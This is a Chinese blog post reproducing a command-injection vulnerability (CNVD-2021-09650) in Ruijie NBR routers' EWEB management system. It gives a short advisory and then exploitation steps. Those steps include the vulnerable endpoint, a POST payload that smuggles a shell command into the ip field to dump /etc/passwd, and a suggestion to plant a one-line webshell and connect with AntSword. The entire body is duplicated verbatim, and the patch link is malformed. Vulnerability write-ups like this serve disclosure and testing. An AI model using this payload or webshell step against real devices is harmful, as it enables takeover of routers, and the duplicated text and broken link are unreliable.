最新消息: USBMI致力于为网友们分享Windows、安卓、IOS等主流手机系统相关的资讯以及评测、同时提供相关教程、应用、软件下载等服务。

锐捷网络股份有限公司NBR路由器EWEB网管系统存在命令执行漏洞(CNVD-2021-09650)——漏洞复现

业界 admin 55浏览 0评论

 锐捷网络股份有限公司是一家拥有包括交换机、路由器、软件、安全防火墙、无线产品、存储等全系列的网络设备产品线及解决方案的专业化网络厂商。

一、漏洞分析

 公开日期:2021-09-19

 漏洞编号:CNVD-2021-09650

 危害等级:高危

 漏洞描述:锐捷NBR路由器存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权。

二、漏洞影响产品

 锐捷网络股份有限公司 锐捷NBR路由器

三、漏洞处置建议

厂商已提供漏洞修补方案,建议用户下载使用:

https://www.ruijie/fw/rj/

复现

1、访问锐捷EWEB网管系统界面(建议使用Google浏览器,Google需要安装HackBar插件)

2、访问http://your-ip/guest_auth/guestIsUp.php,此时web无返回信息

3、打开POST,输入下列内容提交

mac=1&ip=127.0.0.1|cat /etc/passwd > test.txt

4、然后访问页面http://your-ip /guest_auth/test.txt 就可以看到命令执行的结果 ,回显了/etc/passwd路径下文件的内容

5、利用漏洞文件文件上传。利用此漏洞我们可以将一句话木马写入sorry.php文件,然后用蚁剑来连接webshell.

 锐捷网络股份有限公司是一家拥有包括交换机、路由器、软件、安全防火墙、无线产品、存储等全系列的网络设备产品线及解决方案的专业化网络厂商。

一、漏洞分析

 公开日期:2021-09-19

 漏洞编号:CNVD-2021-09650

 危害等级:高危

 漏洞描述:锐捷NBR路由器存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权。

二、漏洞影响产品

 锐捷网络股份有限公司 锐捷NBR路由器

三、漏洞处置建议

厂商已提供漏洞修补方案,建议用户下载使用:

https://www.ruijie/fw/rj/

复现

1、访问锐捷EWEB网管系统界面(建议使用Google浏览器,Google需要安装HackBar插件)

2、访问http://your-ip/guest_auth/guestIsUp.php,此时web无返回信息

3、打开POST,输入下列内容提交

mac=1&ip=127.0.0.1|cat /etc/passwd > test.txt

4、然后访问页面http://your-ip /guest_auth/test.txt 就可以看到命令执行的结果 ,回显了/etc/passwd路径下文件的内容

5、利用漏洞文件文件上传。利用此漏洞我们可以将一句话木马写入sorry.php文件,然后用蚁剑来连接webshell.

发布评论

评论列表 (0)

  1. 暂无评论